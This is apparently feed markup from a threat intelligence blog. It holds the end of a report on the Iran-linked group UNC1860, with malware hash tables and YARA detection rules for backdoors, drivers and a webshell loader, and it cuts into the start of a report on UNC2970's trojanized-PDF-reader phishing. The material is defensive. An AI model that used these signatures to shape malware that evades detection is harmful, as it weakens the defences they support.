style="vertical-align: baseline;">4abcf21b63781a53bbc1aa17bd8d2cbc</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">a3ea0d13848a104c28d035a9d518acc2</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">bd6464f12bb6f7f02b6ffebb363d8e5f</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">f89be788e4adf665acf1a8ef8fcaa133</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">f292e61774c267c3787fdfcace50ea7b</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">c11a4e4a2d484513f79bd127a0387b0c</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">14e54ff4805840e656efb8cd38de4751</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">3d5d05f230ae702c04098de512d93d48</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">a038975255d3dda636d86ccd307f7838</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">31f2369d2e38c78f5b3f2035dba07c08</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">c21eefc65cda49f17ddd1d243a7bffb5</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">c8fa0ce3ae6a13af640607ea606c55f9</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">2cece71e107d12ffd74b2fb24bf339a6</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">fa1c6f7a5e02374b9d33de2578cb3399</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">1e896f026246872b2feb4f8e3e093815</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">57c916da83cc634af22bde0ad44d0db3</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">07db3058e32fe5f36823dc7092cd7d5b</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">3dd829fb27353622eff34be1eabb8f18</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">1e6679cd25d1bb127a0bec665adcf21e</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">2e803d28809be2a0216f25126efde37b</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">2398a83f10329a107801d3d23d06f7cb</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">73fb0fe5cd96a14a4f85639223aec6a8</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">85427a8a47c4162b48d8dfb37440665d</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">a500561c0b374816972094c2aa90da2a</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">a65ee1a82975ee4c8d4e70219e1bfff5</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ce537dd649a391e52c27a3f88a0a8912</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">e67687b4443f58d2b0a465e3af3caffe</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">b34883fb1630db43e06a38cebfa0bce2</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">46804472541ed61cc904cd14be18fe1d</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">4de802f7e61cb8c820a02e042b58b215</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">929b12bc9f9e5f8e854de1d46ebf40d9</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">f0dfb7bf01c0412891da8fa2702f4c7b</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">b219672bcd60ce9a81b900217b3b5864</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">fc90907e70f18c7f6a6b9d9599b6f97c</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">d1e45afbfd3424612b4a4218cc7357ef</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">da0085a97c38ead734885e5cced1847f</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">490590bfdeeedf44b3ae306409bb0d03</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">e86e885e6c96ac72482741d8696c17fb</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ca3f0d25f7da0e8cde8e1f367451c77a</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">7b2fa099d51fa3885766f6d60d768748</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">6626dbe74acd15d06ff6900071ef240c</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h3>YARA Rules</h3></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Autopatt_DropperMemonly_WINTAPIX_1 { meta: author = Mandiant description = "wintapix malware family" created = "06/26/2023" modified = "06/26/2023" version = "1.0" strings: $p00_0 = {84ec5ff5f84863f6e9[4]66458b65??4981c5[4]4d0faccf} $p00_1 = {0f16c00f11014c03c14883c1?? 4883e1??4c2bc14d8bc849c1e9??74} condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and ( ($p00_0 in (660000..690000) and $p00_1 in (9700..20000)) ) }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>import "pe" rule M_WINTAPIX_StringDecodingMethod_1 { meta: author = Mandiant hash1 = "286bd9c2670215d3cb4790aac4552f22" hash2 = "4dd6250eb2d368f500949952eb013964" desc = "Detects the byte pattern of a string decoding method found in the WINTAPIX driver image" strings: $a1 = { 48 89 54 24 10 48 89 4C 24 08 48 83 EC 18 C7 04 24 00 00 00 00 48 63 04 24 48 8B 4C 24 ?? 0F BE 04 01 48 8B 4C 24 ?? 0F B6 49 ?? 33 C1 48 63 0C 24 48 8B 54 24 ?? 88 04 0A 8B 04 24 FF C0 89 04 24 8B 04 24 FF C8 48 98 48 8B 4C 24 ?? 0F B6 04 01 85 C0 75 } condition: uint16(0) == 0x5A4D and filesize &lt; 1MB and pe.subsystem == pe.SUBSYSTEM_NATIVE and all of them }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>import "pe" rule M_WINTAPIX_PaddedStrings_1 { meta: author = Mandiant hash1 = "286bd9c2670215d3cb4790aac4552f22" hash2 = "4dd6250eb2d368f500949952eb013964" desc = "Detects unique strings found in the WINTAPIX driver image" strings: $a1 = { CC CC CC CC CC CC CC 4E 74 44 65 6C 61 79 45 78 65 63 75 74 69 6F 6E 00 } $a2 = { CC CC CC CC CC 5C 00 } $a3 = "InitSafeBootMode" ascii fullword condition: uint16(0) == 0x5A4D and pe.subsystem == pe.SUBSYSTEM_NATIVE and filesize &lt; 1MB and ( ( all of them and #a2 == 2 ) or pe.imphash() == "8d070a93a45ed8ba6dba6bfbe0d084e7" ) }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>import "dotnet" rule M_UNC1860_TEMPLEDOOR_Strings_1 { meta: author = Mandiant date = "28/02/2024" hash1 = "caffdb648a0a68cd36694f0f0c7699d7" desc = "Detects the TEMPLEDOOR family based on unique strings" comment = "Triggers on TUNNELBOI sample c517519097bff386dc1784d98ad93f9d" strings: $url = "{0}://+:{1}/{2}/" wide fullword $a1 = "+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2 PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtb DsgY2hhcnNldD1pc28tODg1OS0xIi8" wide $b1 = "Jet" wide fullword $b2 = " Ver" wide fullword $b3 = "CmD" wide fullword $c1 = "Command" wide fullword $c2 = "Upload" wide fullword $c3 = "Download" wide fullword $c4 = "Load" wide fullword $c5 = "Rundll" wide fullword $c6 = "ERROR" wide fullword condition: int16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and dotnet.is_dotnet and $url and ( $a1 or 2 of ($b*) or 5 of ($c*) ) }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>import "dotnet" rule M_UNC1860_TEMPLEDOOR_BytePatterns_1 { meta: author = Mandiant date = "28/02/2024" hash1 = "caffdb648a0a68cd36694f0f0c7699d7" desc = "Detects the TEMPLEDOOR family based on unique byte patterns" comment = "Triggers on TUNNELBOI sample c517519097bff386dc1784d98ad93f9d and on WINPAY sample b219672bcd60ce9a81b900217b3b5864" strings: $encode_msil = { 7E ?? ?? 00 04 1F 41 1F 61 6F ?? ?? 00 0A D2 0A 02 2C 07 02 8E 16 FE 03 2B 01 16 2C 69 16 0B 2B 0F 02 07 02 07 91 06 61 19 58 D2 9C 07 17 58 0B 07 02 8E 69 FE 04 2D E9 02 28 ?? ?? 00 0A } // Packet encoding method MSIL $encryption_key = { 54 62 2d 0c 03 45 49 15 2b 43 59 4a 4e 0c 40 } condition: int16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and dotnet.is_dotnet and any of them }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_OBFUSLAY_UNC1860_1 { meta: desc = "Detects the UNC1860 OBFUSLAY malware by its string decryption method" rs1 = "b66919a18322aa4ce2ad47d149b7fe38063cd3cfa2 e4062cd1a01ad6b3e47651" strings: $a1 = { FE 09 00 00 6F ?? 00 00 0A FE 0E 00 00 FE 0C 00 00 20 02 00 00 00 5B 8D ?? 00 00 01 FE 0E 01 00 20 00 00 00 00 FE 0E 04 00 38 39 00 00 00 FE 0C 01 00 FE 0C 04 00 20 02 00 00 00 5B FE 09 00 00 FE 0C 04 00 20 02 00 00 00 6F ?? 00 00 0A 20 10 00 00 00 28 ?? 00 00 0A 9C FE 0C 04 00 20 02 00 00 00 58 FE 0E 04 00 FE 0C 04 00 FE 0C 00 00 3F BA FF FF FF FE 0C 01 00 } condition: uint16(0) == 0x5A4D and all of them }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_CRYPTOSLAY_UNC1860_1 { meta: desc = "Detects the UNC1860 CRYPTOSLAY malware by its string decryption method" rs1 = "3F2FD2DFD27BF3CAFCBF0946E308832E11A1D9C1 D98FB04AC848E023E6720F53" rs2 = "5c1a42e9baaec115df337d2f4a9dcce8d73f29375921 827e367fcba8499cdfa2" strings: $a1 = { FE 09 00 00 6F ?? 00 00 0A FE 0E 00 00 FE 0C 00 00 20 02 00 00 00 5B 8D ?? 00 00 01 FE 0E 01 00 20 00 00 00 00 FE 0E 04 00 38 39 00 00 00 FE 0C 01 00 FE 0C 04 00 20 02 00 00 00 5B FE 09 00 00 FE 0C 04 00 20 02 00 00 00 6F ?? 00 00 0A 20 10 00 00 00 28 ?? 00 00 0A 9C FE 0C 04 00 20 02 00 00 00 58 FE 0E 04 00 FE 0C 04 00 FE 0C 00 00 3F BA FF FF FF 28 ?? 00 00 0A } $a2 = { FE 09 00 00 6F ?? 00 00 0A FE 0E 00 00 FE 0C 00 00 20 02 00 00 00 5B 8D ?? 00 00 01 FE 0E 01 00 20 00 00 00 00 FE 0E 06 00 38 39 00 00 00 FE 0C 01 00 FE 0C 06 00 20 02 00 00 00 5B FE 09 00 00 FE 0C 06 00 20 02 00 00 00 6F ?? 00 00 0A 20 10 00 00 00 28 ?? 00 00 0A 9C FE 0C 06 00 20 02 00 00 00 58 FE 0E 06 00 FE 0C 06 00 FE 0C 00 00 FE 04 FE 0E 07 00 FE 0C 07 00 3A B0 FF FF FF } condition: uint16(0) == 0x5A4D and any of them }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Autopatt_DropperMemonly_OATBOAT_1 { meta: author = "autopatt" description = "oatboat malware family" created = "02/09/2024" modified = "02/09/2024" version = "1.0" strings: $p00_0 = {48897c24??55488bec4883ec??488bf9c745[5]33d bc745[5]488d4d} $p00_1 = {443ac975??48ffc64883c3??493bf372??498b42??4885c075} condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and ( ($p00_0 in (250..6500) and $p00_1 in (0..6000)) ) }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule SASHEYAWAY_Strings_1 { meta: desc = "Strings observed in the webshell loader" rs1 = "2538767f13218503bccf31fccb74e753199 4b69a36a3780b53ba5020d938af20" strings: $ = "FromBase64String" $ = "Page Language=\"C#\"" $ = "private static System.Reflection.Assembly" $ = "Page_Load" $ = "System.Reflection.MethodInfo" $ = "Activator.CreateInstance" $ = "Invoke" condition: all of them }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_Backdoor_TOFULOAD_1 { meta: author = Mandiant date_created = "2023-08-15" date_modified = "2023-08-15" description = "This is a hunting rule to look for TOFULOAD backdoor used by UNC1860" md5 = "d1ce3117060e85247145c82005dda985" strings: $s1 = {66 77 88 99 48 8D [2] C7 [2] 52 74 6C 52} // 0x99887766; LEA ??, ??; MOV ??, 'RltR'; $s2 = {B8 E1 83 0F 3E F7 [1] C1 [1] 03 0F [2] 6B [1] 21} // MOV ??, 0x3E0F83E1; MUL ??, ??; SHR ??, 03; MOVZX ??, ??; IMUL ??, ??, 21; $s3 = {FF [1] 40 [2] 43 32 [2] 41 88 [3] 44 8B [1] 4D [2] 7C} // INC ??; MOV ??, ??; XOR ??, ??; MOV ??, ??; MOV ??, ??; CMP ??, ??; JL condition: filesize &lt; 50KB and any of them }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>import "dotnet" rule M_UNC1860_TEMPLEDROP_Strings_2 { meta: author = Mandiant date = "28/02/2024" hash1 = "6d3041b89484c273376e5189e190d235" desc = "Detects the TEMPELDROP family based on unique strings" comment = "Triggers on TEMPLEDOOR controller sample c517519 097bff386dc1784d98ad93f9d" strings: $a1 = "Nothing changed :D" wide fullword $a2 = "Access: KO" wide fullword $a3 = "Eventlog stoped." wide fullword $b1 = "The Microsoft Exchange Self Protection Driver." wide fullword $b2 = "The Microsoft Exchange Filter Driver." wide fullword $c1 = "Create RegKey: " wide $c2 = "Create Service: " wide $c3 = "Test Event lock: " wide $c4 = "Test http listner: " wide $c5 = "Test IO Changes: " wide $c6 = "Test 'Event lock': " wide $d1 = "no active http port to listen." wide $d2 = "Prefixes.Add Error , " wide $d3 = "' driver service created and started." wide $d4 = "' service started." wide $d5 = "Unhandled exception on create reg key " wide $d6 = "Failed to change file 'CreationTime'." wide condition: int16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and dotnet.is_dotnet and ( 1 of ($a*) or 1 of ($b*) or 2 of ($c*) or 2 of ($d*) ) }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Autopatt_Backdoor_TOFUDRV_1 { meta: author = Mandiant description = "tofudrv malware family" created = "11/29/2023" modified = "11/29/2023" version = "1.0" strings: $p00_0 = {eb??33c083f8??0f85[4]488b4c24??e8[4]eb??c74424[5]eb} $p00_1 = {f3aa41b8[4]33d2488d4c24??e8[4]488b8424[4]48898424[4]48638424[4]48898424} condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and ( ($p00_0 in (34000..45000) and $p00_1 in (28000..39000)) ) }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>import "pe" rule M_TOFUDRV_Strings_1 { meta: author = Mandiant hash = "b4b1e285b9f666ae7304a456da01545e" desc = "Detects cleartext strings that appear in the TOFUDRV image" strings: $a1 = "\\systemroot\\system32\\drivers" ascii fullword $a2 = "\\SafeBoot\\Minimal\\" ascii fullword $a3 = "\\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\Control" ascii fullword $a4 = "\\SafeBoot\\Network\\" ascii fullword $a5 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" ascii fullword $a6 = "Found" ascii fullword condition: uint16(0) == 0x5A4D and filesize &lt; 500KB and pe.subsystem == pe.SUBSYSTEM_NATIVE and ( 3 of them or pe.imphash() == "ff6f16b00c9f36b32cd60fecd4dfc8e9" ) }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>import "pe" rule M_TOFUDRV_RtlSubtreeStackStrings_1 { meta: author = Mandiant hash = "b4b1e285b9f666ae7304a456da01545e" desc = "Detects a stack string byte pattern in a function intended to resolve the memory image base of ntoskrnl.exe in TOFUDRV" strings: // "RtlSubtreePredecessor" $a1 = { C6 44 24 ?? 52 C6 44 24 ?? 74 C6 44 24 ?? 6C C6 44 24 ?? 53 C6 44 24 ?? 75 C6 44 24 ?? 62 C6 44 24 ?? 74 C6 44 24 ?? 72 C6 44 24 ?? 65 C6 44 24 ?? 65 C6 44 24 ?? 50 C6 44 24 ?? 72 C6 44 24 ?? 65 C6 44 24 ?? 64 C6 44 24 ?? 65 } // "RtlSubtreeSuccessor" $a2 = { C6 84 24 ?? 00 00 00 6C C6 84 24 ?? 00 00 00 53 C6 84 24 ?? 00 00 00 75 C6 84 24 ?? 00 00 00 62 C6 84 24 ?? 00 00 00 74 C6 84 24 ?? 00 00 00 72 C6 84 24 ?? 00 00 00 65 C6 84 24 ?? 00 00 00 65 C6 84 24 ?? 00 00 00 53 C6 84 24 ?? 00 00 00 75 } $KeGetPcr = { 65 48 8B 04 25 18 00 00 00 48 89 44 24 } condition: uint16(0) == 0x5A4D and filesize &lt; 500KB and pe.subsystem == pe.SUBSYSTEM_NATIVE and $KeGetPcr and any of ($a*) }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Dropper_MSIL_TEMPLESHOT_1 { meta: author = Mandiant date_created = "2020-05-22" date_modified = "2020-05-22" md5 = "6d3041b89484c273376e5189e190d235" rev = 2 strings: $ss1 = "--install" fullword wide $ss2 = "' directory created." fullword wide $ss3 = "' file created." fullword wide $ss4 = "' service created." fullword wide $ss5 = "Nothing changed :D" fullword wide $ss6 = "\x00ProtectDriver\x00" $ss7 = "\x00WriteAllBytes\x00" $ss8 = "\x00CopyTime\x00" $ss9 = "T\x00V\x00q\x00Q\x00" condition: ( uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 ) and all of them }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Backdoor_MSIL_TEMPLESHOT_2 { meta: author = Mandiant date_created = "2020-05-22" date_modified = "2020-05-22" md5 = "a991bdbf1e36d7818d7a340a35a4ea26" rev = 2 strings: $sb1 = { 02 7B [2] 00 04 [0-8] FE 03 [0-8] 39 [4-8] 02 7B [2] 00 04 [5] 0? 02 7B [2] 00 04 [5-12] 0C } $sb2 = { 7B [2] 00 04 [0-16] 13 ?? 11 [1-8] 17 59 45 04 00 00 00 02 [4-64] 2B ?? 02 [1-2] 7B [2] 00 04 73 [2] 00 06 28 [2] 00 06 0A 2B ?? 02 [1-2] 7B [2] 00 04 73 [2] 00 06 28 [2] 00 06 [0-4] 0A 2B } $ss1 = "\x00set_UseShellExecute\x00" $ss2 = "\x00HttpListenerRequest\x00" $ss3 = "\x00HttpListenerResponse\x00" $ss4 = "\x00HttpListener\x00" condition: ( uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 ) and all of them }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Backdoor_MSIL_TEMPLESHOT_1 { meta: author = Mandiant date_created = "2020-05-22" date_modified = "2020-05-22" md5 = "952482949f495fb66e493e441229ae4b" rev = 2 strings: $sb1 = { 06 17 7D [4] 06 20 36 01 00 C0 7D [4] DE 00 07 15 3B [4] 07 28 [4-12] 0D [8-64] 11 06 [4-12] 13 07 11 07 39 [4-32] 20 FF FF 1F 00 12 09 [0-12] 11 09 12 0A [4-12] 12 0A 11 07 } $ss1 = "\x00GetProcessById\x00" $ss2 = "\x00NtOpenThread\x00" $ss3 = "\x00NtQueryInformationThread\x00" $ss4 = "\x00ReadProcessMemory\x00" $ss5 = "\x00NtTerminateProcess\x00" $ss6 = "\x00set_UseShellExecute\x00" $ss7 = "\x00DESCryptoServiceProvider\x00" $ss8 = "\x00GetExecutingAssembly\x00" condition: ( uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 ) and all of them }</code></pre></div></description><pubDate>Thu, 19 Sep 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/unc1860-iran-middle-eastern-networks/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>UNC1860 and the Temple of Oats: Iran’s Hidden Hand in Middle Eastern Networks</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/unc1860-iran-middle-eastern-networks/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>An Offer You Can Refuse: UNC2970 Backdoor Deployment Using Trojanized PDF Reader</title><link>https://cloud.google.com/blog/topics/threat-intelligence/unc2970-backdoor-trojanized-pdf-reader/</link><description><div class="block-paragraph_advanced"><p>Written by: <span style="vertical-align: baseline;">Marco Galli, Diana Ion, Yash Gupta, Adrian Hernandez, Ana Martinez Gomez, Jon Daniels, Christopher Gardner</span></p> <hr/></div> <div class="block-paragraph_advanced"><h2 style="text-align: left;"><span style="vertical-align: baseline;">Introduction</span></h2> <p><span style="vertical-align: baseline;">In June 2024, </span><a href="https://cloud.google.com/security/products/managed-defense"><span style="text-decoration: underline; vertical-align: baseline;">Mandiant Managed Defense</span></a><span style="vertical-align: baseline;"> identified a cyber espionage group suspected to have a North Korea nexus, tracked by Mandiant under UNC2970. Later that month, Mandiant discovered additional phishing lures masquerading as an energy company and as an entity in the aerospace industry to target victims in these verticals.</span></p> <p><span style="vertical-align: baseline;">UNC2970 targets victims under the guise of job openings, masquerading as a recruiter for prominent companies. Mandiant has observed UNC2970 copy and tailor job descriptions to fit their respective targets.</span></p> <p><span style="vertical-align: baseline;">UNC2970 engaged with the victim over email and WhatsApp and ultimately shared a malicious archive that is purported to contain the job description in PDF file format. The PDF file has been encrypted and can only be opened with the included trojanized version of SumatraPDF to ultimately deliver MISTPEN backdoor via BURNBOOK launcher. </span></p> <p><span style="font-style: italic; vertical-align: baseline;">Mandiant observed UNC2970 modify the open source code of an older SumatraPDF version as part of this campaign. This is not a compromise of SumatraPDF, nor is there any inherent vulnerability in SumatraPDF. Upon discovery, Mandiant alerted SumatraPDF of this campaign for general awareness.</span></p> <h2 style="text-align: left;"><span style="vertical-align: baseline;">Overview</span></h2> <p><span style="vertical-align: baseline;">UNC2970 relies on legitimate job description content to target victims employed in U.S. critical infrastructure verticals. The job description is delivered to the victim in a password-protected ZIP archive containing an encrypted PDF file and a modified version of an open-source PDF viewer application. </span></p> <p><span style="vertical-align: baseline;">Mandiant noted slight modifications between the delivered job descriptions and their originals, including the required qualifications, experience and skills, likely to better align with the victim's profile. Moreover, the chosen job descriptions target senior-/manager-level employees. This suggests the threat actor aims to gain access to sensitive and confidential information that is typically restricted to higher-level employees.</span></p> <p><span style="vertical-align: baseline;">To illustrate this, Mandiant analyzed the differences between the original job description and UNC2970's job description included in the ZIP archive.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/mistpen-fig1.max-1000x1000.png" alt="Page 1 of PDF lure"> </a> <figcaption class="article-image__caption "><p data-block-key="dnufk">Figure 1: Page 1 of PDF lure</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">For example, under the "Required Education, Experience, &amp; Skills</span><strong style="vertical-align: baseline;">" </strong><span style="vertical-align: baseline;">section, the original post mentions "</span><span style="font-style: italic; vertical-align: baseline;">United States Air Force or highly comparable experience</span><span style="vertical-align: baseline;">," while the malicious PDF omits this line. Another omitted line is under the "Preferred Education, Experience, &amp; Skills"</span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">section, where the original job description includes "</span><span style="font-style: italic; vertical-align: baseline;">Preferred location McLean, Virginia</span><span style="vertical-align: baseline;">."</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/mistpen-fig2.max-1000x1000.png" alt="Original vs. modified"> </a> <figcaption class="article-image__caption "><p data-block-key="fkwpw">Figure 2: Original vs. modified</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Additionally, Mandiant discovered a similar ZIP archive that was uploaded to VirusTotal, having an identical structure, but containing a different job description. The PDF content is consistent with a legitimate job description from the nuclear energy sector.</span></p> <h2 style="text-align: left;"><span style="vertical-align: baseline;">The Infection Chain Explained</span></h2> <p><a href="https://cloud.google.com/security/products/managed-defense"><span style="text-decoration: underline; vertical-align: baseline;">Mandiant Managed Defense</span></a><span style="vertical-align: baseline;"> discovered that the victim downloaded and opened a password protected ZIP archive received through WhatsApp chat, expecting to see a document containing a job description. Upon analysis, the ZIP archive contains several files, briefly described in Table 1:</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong 